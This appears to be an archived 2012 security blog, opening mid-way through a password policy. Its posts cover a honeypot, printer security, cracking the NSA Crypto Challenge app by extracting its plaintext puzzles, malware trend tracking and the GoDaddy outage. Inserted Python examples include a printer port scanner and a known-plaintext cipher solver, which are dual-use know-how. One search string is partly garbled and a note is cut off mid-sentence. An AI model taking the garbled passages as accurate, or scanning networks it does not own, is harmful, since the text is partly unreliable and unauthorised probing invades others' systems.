7. Other words that cannot be used are Texas, child, and the months of the year.
8. A new password cannot be too similar to the previous password.
   1. Example: previous password - abc#1234, acceptable new password - acb$1243
   2. Characters in the first, second, and third positions cannot be identical. (abc*****)
   3. Characters in the second, third, and fourth positions cannot be identical. (*bc#****)
   4. Characters in the sixth, seventh, and eighth positions cannot be identical. (*****234)

A password can be changed voluntarily (no Help Desk assistance needed) once in a 15-day period. If needed, the Help Desk can reset the password at any time. The previous 8 passwords cannot be reused.
1. http://portal.cs.oag.state.tx.us/OAGStaticContent/portal/login/help/ChangePassword.htm

2.7 July

2.7.1 Watch my Honeypot LIVE! (2012-07-10 01:07)

I've decided to start streaming my honeypot on UStream. No set hours for this yet, but it should be interesting when it is live! Please feel free to check it out over at my [1]UStream Channel. Also, keep an eye on my [2]Twitter for when I go live!
1. http://www.ustream.tv/channel/caffsec
2. http://twitter.com/caffsec

2.7.2

One Image can Change The World (2012-07-17 18:32)

2.7.3

New Hacktool Found on my Honeypot - nt (2012-07-18 19:56)

A script kiddy dropped off a new hack tool on my honeypot today. Today's guest hails from 77.28.151.190, which is in Macedonia, The Former Yugoslav Republic of (MK) in Eastern Europe. The file dropped off, rdp.tgz, is a Linux hack tool for remotely cracking Windows FTP and NT file shares. I was somewhat disappointed that the hack tool isn't more complex; however, since it is still a new hack tool which isn't detected by any antivirus software, I figured it was worth mentioning. I've uploaded a full analysis at: [1]http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/nt
1. http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/nt

2.7.4

QR Code Analyzer - Android for the Paranoid (2012-07-20 07:22)

Sometimes you find that some apps just aren't enough for the paranoid. Sometimes the apps available in the marketplace just aren't sufficient for a paranoid person to fulfill their security obsession. One gap I've found is that there appears to be no app out there to analyze QR codes for malware, outside antivirus software. In response to this, using MIT App Inventor, I have created an app which uses VirusTotal.com's API in order to submit QR code URLs for scanning. Note that this app does NOT address possible security flaws with QR codes themselves. However, it does submit any URL a QR code contains to VirusTotal, and provides a link to the resulting report. I encourage you to try out this wonderful new app. The latest version can be downloaded here: [1]http://code.google.com/p/caffsec-malware-analysis/downloads/list Source code is also available: [2]http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/tools/QRAnalyzer

[3]

[4]
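As an added example (my own code, not the App Inventor app's), here is the same idea in Python: a local triage of the decoded payload, which covers the cases the post says the app does not address (action schemes such as tel: and sms:, link shorteners, punycode hosts), followed by the VirusTotal v2 url/scan submission the app performs. The endpoint and form fields are the v2 public API as it existed at the time; the scheme and shortener lists are my assumptions; the reply is a constructed sample in the v2 shape, and no network call happens unless submit_for_scan is invoked with a real key.

```python
import json
import re
import urllib.parse
import urllib.request

# VirusTotal public API v2 URL-scan endpoint (the API generation available in 2012).
VT_URL_SCAN = "https://www.virustotal.com/vtapi/v2/url/scan"

# Assumption: schemes a phone acts on directly and that deserve attention before any
# reputation lookup; the lists are illustrative, not exhaustive.
ACTION_SCHEMES = {"javascript", "data", "file", "tel", "sms", "smsto", "mailto", "intent", "market"}
SHORTENERS = {"bit.ly", "goo.gl", "t.co", "tinyurl.com", "ow.ly", "is.gd"}


def triage(payload):
    """Classify a decoded QR payload and list local warning signs.

    Returns {"kind": ..., "url": str or None, "findings": [...]}; "url" is set only for
    http(s) URLs, the only payload type worth submitting to a URL scanner."""
    text = payload.strip()
    parsed = urllib.parse.urlsplit(text)
    scheme = parsed.scheme.lower()
    findings = []
    if not scheme:
        return {"kind": "text", "url": None, "findings": ["payload is not a URL"]}
    if scheme in ACTION_SCHEMES:
        findings.append("scheme '%s' triggers an action instead of opening a page" % scheme)
    host = (parsed.hostname or "").lower()
    if host in SHORTENERS:
        findings.append("link shortener hides the real destination")
    if host.startswith("xn--") or ".xn--" in host:
        findings.append("punycode hostname (possible homograph)")
    if "@" in parsed.netloc:
        findings.append("user-info before the host (classic host-spoofing trick)")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        findings.append("bare IP address instead of a hostname")
    if scheme == "http":
        findings.append("plain http: the page can be tampered with in transit")
    is_web = scheme in ("http", "https")
    return {"kind": "url" if is_web else scheme, "url": text if is_web else None, "findings": findings}


def build_scan_request(api_key, url):
    """The HTTP POST the v2 API expects: form-encoded apikey and url."""
    body = urllib.parse.urlencode({"apikey": api_key, "url": url}).encode()
    return urllib.request.Request(VT_URL_SCAN, data=body, method="POST")


def parse_scan_response(body):
    """Pull the report link out of a v2 url/scan reply; None if VT rejected the submission."""
    reply = json.loads(body)
    if reply.get("response_code") != 1:
        return None
    return reply.get("permalink")


def submit_for_scan(api_key, url, opener=urllib.request.urlopen):
    """Network call (not exercised offline): submit the URL and return the report permalink."""
    with opener(build_scan_request(api_key, url), timeout=15) as resp:
        return parse_scan_response(resp.read().decode("utf-8"))


# Constructed reply in the shape v2 returns; the hash and timestamp are placeholders.
SAMPLE_REPLY = json.dumps({
    "response_code": 1,
    "verbose_msg": "Scan request successfully queued, come back later for the report",
    "scan_id": "0" * 64 + "-1343000000",
    "permalink": "https://www.virustotal.com/url/" + "0" * 64 + "/analysis/1343000000/",
})
```

The triage step matters because a URL scanner only ever sees http(s) URLs: a QR code carrying tel:, sms: or an intent: URL never reaches VirusTotal at all, so the app's "no findings" would be silence, not a clean bill of health.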
1. http://code.google.com/p/caffsec-malware-analysis/downloads/list 2. http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/tools/QRAnalyzer 3. http://4.bp.blogspot.com/-h1FVzQpxFFI/UAmUQgqT-5I/AAAAAAAAALY/xEmvuEGduQU/s1600/QRAnalyzer1.jpg 4. http://4.bp.blogspot.com/-SwCqwORcazU/UAmUZhekm9I/AAAAAAAAALg/fFC5ZLPysxE/s1600/QRAnalyzer2.jpg

2.7.5

Printer Malware - The Next Big Threat? (2012-07-23 13:54)

Does your organization secure its printers? Many modern multi-function printers have their own mini-servers built in, offering web, FTP, and file share access. When not properly secured, these printers can pose just as high a security risk as unsecured, non-isolated SCADA devices. Related Reading: [1]Indian businesses also affected as office printers hit globally by gibberish computer virus [2]SANS: Auditing and Securing Multifunction Devices
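The post does not say how to check a printer. As an added example (not from the post or the SANS paper), this script probes a printer for the services the post names plus the usual print-protocol ports and turns the result into review items. The port list and the findings are my assumptions about typical defaults; the self-test uses loopback sockets so it runs without a printer.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Assumption: the management and transfer services a typical multi-function printer
# ships with; port/role pairs are common defaults, not taken from any specific vendor.
PRINTER_SERVICES = {
    21: "FTP (scan-to-FTP, firmware upload)",
    23: "telnet management",
    80: "HTTP web console",
    443: "HTTPS web console",
    445: "SMB file share (scan-to-folder)",
    515: "LPD print spooler",
    631: "IPP / CUPS",
    9100: "raw print port (JetDirect)",
}


def port_open(host, port, timeout=1.0):
    """TCP connect probe: True if something on host accepts a connection on port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return True
        except OSError:
            return False


def exposed_services(host, services=PRINTER_SERVICES, timeout=1.0):
    """Map of open port -> service description for host, probing the ports in parallel."""
    with ThreadPoolExecutor(max_workers=min(16, len(services))) as pool:
        results = list(pool.map(lambda p: (p, port_open(host, p, timeout)), services))
    return {port: services[port] for port, is_open in results if is_open}


def findings(open_ports):
    """Turn the open-port map into review items for the printer's owner."""
    items = []
    if 21 in open_ports or 23 in open_ports:
        items.append("cleartext admin/transfer protocols exposed (FTP/telnet): disable or firewall")
    if 80 in open_ports and 443 not in open_ports:
        items.append("web console only over HTTP: credentials cross the network in the clear")
    if 445 in open_ports:
        items.append("SMB exposed: check share permissions and the account used for scan-to-folder")
    if 9100 in open_ports:
        items.append("raw port 9100 open: anyone who can reach it can print or push PJL commands")
    if any(p in open_ports for p in (80, 443, 23)):
        items.append("management interface reachable: confirm the default admin password was changed")
    return items


def loopback_selftest():
    """Offline check of the probe: one listening port and one closed port on 127.0.0.1."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                      # nothing listens on closed_port any more
    try:
        return exposed_services("127.0.0.1", {open_port: "listener", closed_port: "closed"}, timeout=0.5)
    finally:
        listener.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"   # RFC 5737 placeholder address
    found = exposed_services(target)
    for port, role in sorted(found.items()):
        print("%5d  %s" % (port, role))
    for item in findings(found):
        print("-", item)
```

A connect scan only tells you what answers; the follow-up is to log in to each reachable console with the vendor's default credentials, since an unchanged default on a device that also holds scan-to-folder credentials and a copy of every document it has printed is the real exposure.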
1. http://www.newstrackindia.com/newsdetails/2012/06/23/ 97-Indian-businesses-also-affected-as-office-printers-hit-globally-by-gibberish-computer-virus-.html 2. http://www.sans.org/reading_room/whitepapers/networkdevs/auditing-securing-multifunction-devices_1921

2.7.6

London 2012 Olympics Malware and Scam Alert (2012-07-23 23:05)

It's important to note that with the London 2012 Olympics rapidly approaching, computer users should be on the lookout for spam messages as well as malicious web search results featuring the London 2012 Olympics. TrendMicro has already found some [1]scams in the wild advertising supposed free tickets to the London 2012 Olympics. An Olympics-themed trojan has already been [2]spreading through social networks. AVG has a [3]preview of additional malware threats which may be associated with the London 2012 Olympics, as well as some important tips for avoiding an Olympics-themed malware infection. It is very important to make sure your friends and family know how to look for suspicious links, messages, or emails regarding the Olympics. Remember the old saying: "If it's too good to be true, it probably isn't true."

1. http://blog.trendmicro.com/spammed-messages-cash-in-on-london-2012-olympics/ 2. http://news.softpedia.com/news/Olympics-Malware-Spreads-by-Interacting-with-Facebook-and-Skype-282382.shtml 3. http://blogs.avg.com/consumer/avg-codeword-london-olympics-2012-malware-risks/

2.7.7

How I cracked the NSA Crypto Challenge in Record Time (2012-07-28 23:33)

The NSA recently released an Android app called the [1]NSA Crypto Challenge. Being in the security field, I was very interested in this app. So of course I decided to give it a try and see how quickly I could break the codes. Being ambitious, I decided to jump straight into Advanced mode. My score? 2 minutes, 43 seconds.

[2]

Now for those of you who have played this game on Advanced mode, you're probably amazed by the speed with which I was able to decode this. For those who haven't played it yet, let me show you an example puzzle on Advanced mode.

[3]

I would have decoded this puzzle a lot quicker, but unfortunately I'm not a very fast typist with an on-screen keyboard. Now you're probably wondering how I can decrypt this text so fast? The secret is to attack the puzzle with known plaintext, something the NSA probably wasn't expecting you to do. It's a little known fact that Android .apk installers are actually ordinary zip archives. To peek under the hood, all you need to do is download the .apk and rename it to .zip. Inside, you'll see a folder structure similar to this:

[4]

Once you've entered the archive, it's just a matter of traversing folders until you find something interesting...like this:

[5] There are all sorts of interesting files underneath the Resources folder. The first that stands out is Cipher.txt. I wonder what that is...

[6] It just happens to be the encryption and decryption algorithms! Unfortunately, the algorithms use a completely random key, so this won't help us solve the puzzle. But wait, remember that folder PuzzlePacks? I wonder what's in there?

[7] These files look promising. Could it be that these files contain the original plaintext puzzles?

[8] In fact, yes they do, in XML format. Now that we have the original plaintext, we can perform a known plaintext attack against the puzzle. Count the number of characters in each word of the example puzzle. You don't have to do every word; just the first two or three should do.

[9] Now we know we're looking for plaintext with 1 letter followed by 8 letters followed by 4 letters. A quick scan of the plaintext files finds the following:

A wireless room set up in the Bletchley Park mansion's water tower was codenamed Station X.

So, we simply start substituting letters, and we've solved our puzzle!

[10] Is this cheating? Well, not really. Known plaintext attacks are very commonly used, and in fact known plaintext ("cribs") helped the Allies crack German Enigma machine traffic in World War II. No doubt this is not an attack method that the developers of this software intended...but when you're cracking encryption codes, sometimes you need to think outside the box.
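The attack above, as an added example in Python (my code, not the app's and not the author's): apk_entries shows that an .apk opens as a zip without renaming; the rest matches the ciphertext against a corpus of candidate plaintexts by word pattern (the letter-repetition pattern, which a substitution cipher preserves and which is stricter than the word lengths the post counts), derives the substitution key from the matching crib, and decrypts. The corpus and the in-memory apk are constructed stand-ins for the PuzzlePacks XML files; the cryptogram is generated with a random substitution key, the way the post describes the app keying each puzzle.

```python
import io
import random
import string
import zipfile

# Constructed stand-in for the plaintext puzzle packs found inside the .apk.  The first
# sentence is the one quoted in the post; the other two are decoys.
PUZZLE_CORPUS = [
    "A wireless room set up in the Bletchley Park mansion's water tower was codenamed Station X.",
    "The quick brown fox jumps over the lazy dog near the river bank.",
    "A cryptanalyst must find patterns in noise before the enemy changes keys.",
]


def apk_entries(apk, needle="PuzzlePacks"):
    """An .apk is an ordinary zip: list members whose path contains needle, no renaming needed."""
    with zipfile.ZipFile(apk) as archive:
        return [name for name in archive.namelist() if needle in name]


def fake_apk():
    """Constructed in-memory apk with the folder layout the post describes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("classes.dex", b"\x00")
        archive.writestr("res/raw/Cipher.txt", "...")
        archive.writestr("res/raw/PuzzlePacks/pack1.xml", "<puzzles/>")
    buf.seek(0)
    return buf


def letters_only(word):
    return "".join(ch for ch in word.upper() if ch in string.ascii_uppercase)


def word_pattern(word):
    """Letter-repetition pattern, e.g. LETTER -> ABCCBA.  A substitution cipher preserves it,
    so matching on it is stronger than matching on word length alone."""
    seen, out = {}, []
    for ch in letters_only(word):
        seen.setdefault(ch, string.ascii_uppercase[len(seen)])
        out.append(seen[ch])
    return "".join(out)


def text_pattern(text, n_words=None):
    words = [w for w in text.split() if letters_only(w)]
    return tuple(word_pattern(w) for w in words[:n_words])


def find_cribs(ciphertext, corpus, n_words=3):
    """Corpus sentences whose first n_words have the same patterns as the ciphertext's."""
    target = text_pattern(ciphertext, n_words)
    return [p for p in corpus if text_pattern(p, n_words) == target]


def derive_key(ciphertext, plaintext):
    """Cipher->plain letter map from an aligned crib; None if the alignment is in conflict
    (different word counts/lengths, one cipher letter mapping to two plain letters, or vice versa)."""
    c_words = [letters_only(w) for w in ciphertext.split() if letters_only(w)]
    p_words = [letters_only(w) for w in plaintext.split() if letters_only(w)]
    if len(c_words) != len(p_words):
        return None
    key, inverse = {}, {}
    for cw, pw in zip(c_words, p_words):
        if len(cw) != len(pw):
            return None
        for c, p in zip(cw, pw):
            if key.get(c, p) != p or inverse.get(p, c) != c:
                return None
            key[c], inverse[p] = p, c
    return key


def decrypt(ciphertext, key):
    return "".join(key.get(ch, ch) if ch.isalpha() else ch for ch in ciphertext.upper())


def make_cryptogram(plaintext, seed=7):
    """Encrypt with a random monoalphabetic substitution, the way the app keys each puzzle."""
    shuffled = list(string.ascii_uppercase)
    random.Random(seed).shuffle(shuffled)
    table = dict(zip(string.ascii_uppercase, shuffled))
    return "".join(table.get(ch, ch) if ch.isalpha() else ch for ch in plaintext.upper())


def solve(ciphertext, corpus, n_words=3):
    """Known-plaintext attack: find a crib by pattern, derive the key from it, decrypt."""
    for crib in find_cribs(ciphertext, corpus, n_words):
        key = derive_key(ciphertext, crib)
        if key is not None:
            return decrypt(ciphertext, key)
    return None
```

The consistency check in derive_key is what makes this safe to automate: a decoy whose first words happen to share the pattern is rejected as soon as one cipher letter would have to stand for two plaintext letters, so a false crib never produces a wrong "solution".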
1. https://play.google.com/store/apps/details?id=com.caci.nsacryptochallenge 2. http://3.bp.blogspot.com/-Sb7Dc_82sqw/UBSoVKte66I/AAAAAAAAALw/OrKwAs_Tq68/s1600/nsa.jpg 3. http://3.bp.blogspot.com/-m2a6NoDXRkY/UBSpBChm2nI/AAAAAAAAAL4/_StCTZz1EU8/s1600/puzzle1.jpg 4. http://2.bp.blogspot.com/-4KVeK7nTIfg/UBSqboK2uII/AAAAAAAAAMA/PgtjHNiFwFY/s1600/nsacrypto1.png 5. http://4.bp.blogspot.com/-aqtU92u-1WY/UBSq8IQmcKI/AAAAAAAAAMI/-a0FLW_sj-U/s1600/nsacrypto2.png 6. http://3.bp.blogspot.com/-R46vXnWt7MU/UBSrkuhwDDI/AAAAAAAAAMQ/1vAcda6Yodc/s1600/nsacrypto3.png 7. http://3.bp.blogspot.com/-ew_DdtDW65M/UBSsLr5vYtI/AAAAAAAAAMY/Ge8unf6H6_Y/s1600/nsacrypto4.png 8. http://3.bp.blogspot.com/-kIgCaLmDx-k/UBSskO-A_uI/AAAAAAAAAMg/EtQaH3ns_jU/s1600/nsacrypto5.png 9. http://4.bp.blogspot.com/-pYAPTLuztJM/UBStfppYN8I/AAAAAAAAAMo/JstpzkzIkLM/s1600/puzzle3.jpg 10. http://1.bp.blogspot.com/-jQM3z4bZW8I/UBSt99vscDI/AAAAAAAAAMw/kd2g1X4iQ0U/s1600/puzzle2.jpg

2.7.8

Software Spotlight: Sysinternals RootkitRevealer (2012-07-31 11:17)

So, I'm surprised I didn't know about this little gem of software until today. Sysinternals has a wonderful piece of software called [1]RootkitRevealer, which reports discrepancies between the registry and filesystem as seen through the Windows API and as read from the raw on-disk data, indicating a possible hidden rootkit. Unfortunately, it appears to only support Windows XP/2003. If anyone knows of similar software which supports Linux/Mac/Vista/7/etc., I'd be very interested to hear about it. Always looking for new resources for my bag of tricks!
1. http://technet.microsoft.com/en-us/sysinternals/bb897445.aspx

2.8

August

2.8.1

Default Facebook Privacy Settings Randomly Not Working (2012-08-07 17:00)

It has come to my attention that the default Facebook privacy settings are not functioning properly at seemingly random times. Unfortunately you have no idea the settings aren't working correctly until after you post something...

[1] Despite my default setting of Friends Only, I've noticed multiple posts being available to everyone, as indicated by the globe icon below.

[2] It may be worth checking your old posts to see who has access to them. You may be surprised to find some of your posts were set to public. I have posted about this issue on Facebook's support page, but expect little response. One possible workaround to this issue is to go into your Facebook Privacy Settings, change your post privacy to Public, then back to Friends Only. This appears to have corrected the issue for me, for now. If anyone else has encountered this issue, I encourage you to post a comment, and whether or not you managed to fix it.
1. http://1.bp.blogspot.com/-MeN152egdcg/UCFGzsS_fyI/AAAAAAAAANI/11ES9gW51RQ/s1600/privacyFAIL2.PNG 2. http://3.bp.blogspot.com/-M7JXQFtDoPw/UCFEzXMhi7I/AAAAAAAAANA/IQOOdUbY-j4/s1600/privacyFAIL.PNG
2.8.2

Time is Running Out: The 2038 Problem (also known as Y2K part two) (2012-08-12 18:04)

2.9

September

2.9.1

Having Fun with the EICAR Test File (2012-09-06 17:00)

For those not familiar with it, the EICAR Test File is a text file commonly used for verifying that antivirus software is working properly. More info can be found on [1]EICAR.org. I stumbled upon an interesting Bugtraq post from 2003 which I felt was worth sharing. The [2]post disassembles the EICAR test file and looks at how it works. Interesting read, especially if you're interested in programming.
1. http://www.eicar.org/86-0-Intended-use.html 2. http://archive.cert.uni-stuttgart.de/bugtraq/2003/06/msg00251.html

2.9.2

Why Wikipedia should never be used as a Technical Reference (2012-09-09 07:04)

There's been a lot of talk about Wikipedia lately over at Slashdot, with regard to Wikipedia [1]shifting from using primary to secondary sources. When I'm researching a technical issue, and a Wikipedia result is returned, I immediately skip over it. I used to be able to trust Wikipedia as a landing page to find a brief overview of what I'm looking for, then locate additional information. But not anymore. There is an ever-growing trend on Wikipedia to create a "leaner" Wikipedia by simplifying articles, combining articles, and deleting articles. First case in point is the Wikipedia page for [2]Microsoft Macro Assembler. As of this blog post, this is a very small page with History, Object module formats supported by MASM, Some third-party tools that support MASM, and Assemblers compatible with MASM as the main content sections. Strangely missing are the details on the actual MASM assembly language. There's no link to another wiki page. There may be a few references at the bottom to the language, but nothing in the article itself. I considered adding to the article, but then I noticed in the history that there used to be a rather excellent overview of the MASM assembly language, but someone [3]deleted it with the following reason:

major cleanup; remove poorly written and messy MASM assembly language details section which discusses specific aspects of MASM and is best suited for a user's guide

I was really hoping this was a one-off occurrence, but the more I look through Wikipedia, the more saddened I am that the entire community has turned into one large bickering and arguing festival over [4]what needs to be deleted. A somewhat related article, [5]Open Watcom Assembler, has been the victim of merciless edits by multiple users who possibly have no idea what an assembler even is. Let's look at the curious history of Open Watcom Assembler's Wikipedia article... The article was first [6]created on January 28, 2010 with references to material which has nothing to do with the assembler. In fact, one of the references is a C/C++ cryptography book. After someone noticed on February 1, 2010, the irrelevant references were [7]removed:

Removed References with non-substantial reference in Leiterman which simply says: "I do not use it these days, but there is also the Watcom C/C++ with their WASM Assembler."

...only to be [8]re-added minutes later by the original author. An edit war ensued between multiple users, to the point that on February 2, 2010, the article was [9]nominated for deletion as not meeting notability requirements, instead of attempting to improve it further and provide valid references. Fortunately the nomination for deletion resulted in "Keep" on February 10, 2010. However, the edit war and nomination for deletion appear to have resulted in all involved parties becoming so discouraged that they stopped working on the article. The article [10]was not edited again until June 23, 2010, several months later. Events such as the above two examples are why I refuse to use Wikipedia as a technical reference, and why I no longer contribute there. I was never involved in any major disputes at Wikipedia, but I have seen the hard work of others completely disappear because someone who has no idea what an article is even about decides the page needs to be "cleaned up", possibly because they don't understand some of the more technical information on the page. Wikipedia editors have known that deletionism is a growing problem for many years, and even have an [11]article devoted to documenting the issue, which was created in 2008. Interestingly (and ironically) enough, shortly after the article was written, it too was [12]nominated for deletion. If anyone knows a good publicly accessible alternative to Wikipedia for technical resources, please do share; I'll be happy to contribute.
1. http://news.slashdot.org/story/12/09/08/1521229/when-a-primary-source-isnt-good-enough-wikipedia 2. http://en.wikipedia.org/wiki/Microsoft_Macro_Assembler 3. http://en.wikipedia.org/w/index.php?title=Microsoft_Macro_Assembler&diff=501353117&oldid=500780975 4. http://en.wikipedia.org/wiki/Wikipedia:Articles_for_deletion 5. http://en.wikipedia.org/wiki/Open_Watcom_Assembler 6. http://en.wikipedia.org/w/index.php?title=Open_Watcom_Assembler&oldid=340598915 7. http://en.wikipedia.org/w/index.php?title=Open_Watcom_Assembler&diff=341369130&oldid=341367478 8. http://en.wikipedia.org/w/index.php?title=Open_Watcom_Assembler&diff=341371436&oldid=341369130 9. http://en.wikipedia.org/wiki/Wikipedia:Articles_for_deletion/Open_Watcom_Assembler 10. http://en.wikipedia.org/w/index.php?title=Open_Watcom_Assembler&action=history 11. http://en.wikipedia.org/wiki/Deletionism_and_inclusionism_in_Wikipedia 12. http://en.wikipedia.org/wiki/Wikipedia:Articles_for_deletion/Deletionist_versus_Inclusionist_Controversy

2.9.3

Using Google Insights to Track Computer Virus Outbreaks (2012-09-09 08:24)

Google.org currently maintains [1]Google Flu Trends, which works by looking at search keywords as [2]indicators of flu activity. I've been doing some thinking recently: why not apply the same to computer virus outbreaks? I'm still trying to refine the search keywords, but there's a good [3]article on CNet which might provide some starter info. Based upon the article, I've created the following string for Insights. Note that Insights treats + as a logical OR...

computer virus infection + computer slow + computer crashes + program opens slow + annoying popups + is symantec.com down + is mcafee.com down + is trendmicro.com down + cant update antivirus

It's important to note, however, that using the above search string alone will not produce the global infection map we're looking for. This only looks at English-language searches, and does not include searches in other languages. We can, however, use this string to create a nice map showing infection trends in the United States over the past year.

Since most infections result in searches such as "why is my computer slow", here is a multi-lingual search string:

computer slow + ordinateur lent + ordenador lento + bilgisayar yavaş + LED + 0 + : b + computer langsom + f b + компьютер медленно + powolny komputer + !

If the above string is accurate enough to indicate that the user is infected with a virus, then we can view global infection trends for home users. We can try to validate this data by looking at [4]October 2008 through February 2009, when Conficker was infecting the most computer systems. Conficker started infecting computers in November 2008, and in January 2009 reached a peak of possibly [5]15 million infections. More importantly, we can use the data for the past 30 days to monitor for spikes in activity, which would indicate a possible malware infection spreading in the wild. We can also use this data to create a rather interesting [6]global history of malware infections.
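An added example (mine, not part of the post) of the two mechanical pieces of this idea: assembling the OR-joined query string from per-language phrases, and flagging a spike in the resulting daily series against a trailing baseline, which is the "monitor for spikes in activity" step. The per-language phrases are the recoverable ones from the strings above; the 30-day series is constructed, not Insights data.

```python
from statistics import mean, pstdev

# Assumption: per-language phrasings of "computer slow" (only the ones legible above);
# Insights joins OR-terms with " + ".
INDICATOR_TERMS = {
    "en": ["computer slow", "computer virus infection", "cant update antivirus"],
    "fr": ["ordinateur lent"],
    "es": ["ordenador lento"],
    "tr": ["bilgisayar yavaş"],
    "da": ["computer langsom"],
    "ru": ["компьютер медленно"],
    "pl": ["powolny komputer"],
}


def build_query(terms):
    """One Insights query string: every phrase OR-ed together with ' + '."""
    return " + ".join(phrase for phrases in terms.values() for phrase in phrases)


def detect_spikes(series, window=7, z_threshold=2.5, min_delta=10):
    """Flag days whose value sits far above a trailing baseline.

    series: daily values on Insights' relative 0-100 scale.  A day is a spike when it is
    at least z_threshold standard deviations above the mean of the previous `window`
    days AND at least min_delta points above it; the second guard stops a flat baseline,
    whose standard deviation is near zero, from flagging tiny wobbles."""
    spikes = []
    for i in range(window, len(series)):
        baseline = series[i - window:i]
        mu, sd = mean(baseline), pstdev(baseline)
        delta = series[i] - mu
        if delta < min_delta:
            continue
        z = delta / sd if sd > 0 else float("inf")
        if z >= z_threshold:
            spikes.append({"day": i, "value": series[i], "baseline": round(mu, 1), "z": round(z, 1)})
    return spikes


# Constructed 30-day series: four weeks of background noise, then a two-day surge of the
# kind a spreading infection would produce.
SAMPLE_SERIES = [48, 52, 50, 49, 51, 50, 47, 53, 50, 49, 51, 48, 52, 50,
                 49, 51, 50, 47, 53, 50, 49, 51, 48, 52, 50, 49, 51, 50,
                 78, 90]

if __name__ == "__main__":
    print(build_query(INDICATOR_TERMS))
    for spike in detect_spikes(SAMPLE_SERIES):
        print("day %(day)d: %(value)d vs baseline %(baseline)s (z=%(z)s)" % spike)
```

The trailing window is deliberately short so that a spike is compared with last week, not with the whole year; a seasonal lull (the September decline mentioned later in this blog) would otherwise drag the baseline down and make ordinary days look like outbreaks.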
1. http://www.google.org/flutrends/ 2. http://www.google.org/flutrends/about/how.html 3. http://news.cnet.com/8301-13880_3-10217714-68.html 4. http://bit.ly/OFI3Vb 5. http://www.upi.com/Top_News/2009/01/25/Virus_strikes_15_million_PCs/UPI-19421232924206 6. http://bit.ly/VAKw3i

2.9.4

Learnist: Share What you Know (2012-09-09 13:46)

Today I received a perk from Klout.com for an invitation to join [1]Learnist. While I'm under no obligation to actually write about the perk, I really wanted to share this with everyone. I have to say, I'm very impressed. It's a massive community of learning and sharing...all at your own pace, with no pressure to pass tests or earn certificates. I've set up a [2]Cyber Security Tips and Tricks board, and began adding my own how-to articles, as well as other useful resources online. I encourage you to look into the site, and request an invite!
1. http://learni.st/ 2. http://learni.st/users/kenneth.buckler/boards/4740-cyber-security-tips-and-tricks

2.9.5

How to Choose the Right Antivirus and Firewall (2012-09-10 20:13)

Antivirus and firewall software are very important protection for all systems, home or business. If you don't have a budget to purchase software, there are some excellent free programs available. Please note that I am only going to be discussing Windows in this post, as Mac or Linux AV is a completely different subject worthy of a future blog post. The first product you should consider is [1]ZoneAlarm Antivirus+Firewall. This lightweight combination is perfect to maximize protection while minimizing performance impact. However, if you do not want a combination Antivirus+Firewall, it's perfectly acceptable to use ZoneAlarm's standalone firewall product with another antivirus product...but I strongly recommend at a minimum using ZoneAlarm's firewall, as I have yet to find a comparable firewall product for free. If you're looking for an alternative to ZoneAlarm's antivirus, there are many available.

First on the list is AVG (which you can download directly [2]here). Second is [3]Microsoft Security Essentials, which requires a legitimately licensed copy of Windows. Third is [4]ClamWin, an open source antivirus program which is extremely lightweight but does not feature an on-access scanner. If you have a budget to afford antivirus at home, or need to protect your business, VIPRE has written a guide on [5]choosing the right antivirus solution for your business. By the way, if you'd like to support this blog, feel free to make a purchase through our [6]Software Catalog.
1. http://www.kqzyfj.com/lc116vpyvpxCIIHFIHHCEDHKLMEH 2. http://www.jdoqocy.com/gp70qgpmgo39986988354BB4B8C 3. http://windows.microsoft.com/mse 4. http://www.clamwin.com/ 5. http://caffinesecurity-blogspot.tradepub.com/free/w_thre03/?p=w_thre03 6. http://caffeinesecurity.blogspot.com/p/software-catalog.html

2.9.6

The Anonymous Lies Keep Building - GoDaddy and Apple (2012-09-11 12:31)

UPDATE 9/11/2012: Anonymous Own3r is a fraud. The GoDaddy outage was caused by an [1]internal router issue, and not a hacking or denial of service attack. EDITOR'S NOTE: As of writing this article, Anonymous Own3r has not provided proof that he/s Earlier this year I wrote about an Anonymous plan to take down the internet through a massive denial of service attack against the [2]root DNS servers, and how to take steps to avoid being affected. However, this attack never impacted anyone. Today a member of the group Anonymous, who goes by [3]Anonymous Own3r, claimed responsibility for knocking [4]GoDaddy's DNS servers offline. According to the hacker fraudster, he/she acted alone in this attack, and it was not assisted by the Anonymous collective. However, no explanation has yet been posted as to how he/she took down GoDaddy's DNS servers; further investigation reveals that Anonymous Own3r is a fraud, and was not responsible. This revelation comes on the same day that it was revealed that leaked Apple device IDs were from a US company, BlueToad, instead of the FBI, as Anonymous had claimed. According to [5]Netcraft.com the GoDaddy outage lasted approximately 3.25 hours, and affected eight out of GoDaddy's ten hosting locations.

[6] While the percentage of the Internet affected by this outage is not clear, what is clear is that the thousands of web sites and email servers hosted by GoDaddy went dark today during business hours, wreaking havoc on businesses relying on GoDaddy for their web and email presence. Do your Disaster Recovery Plan and Business Continuity Plan include massive outages by your hosting provider? If not, now would be a good time to add it, especially if your organization relies on web and email for its critical business functions. Related Reading: [7]Solution Brief: Disaster Recovery [8]Pre-Testing Disaster Recovery and Business Continuity Plans [9]Recent Lessons in Disaster Recovery [10]Mission Critical (FREE Subscription!)

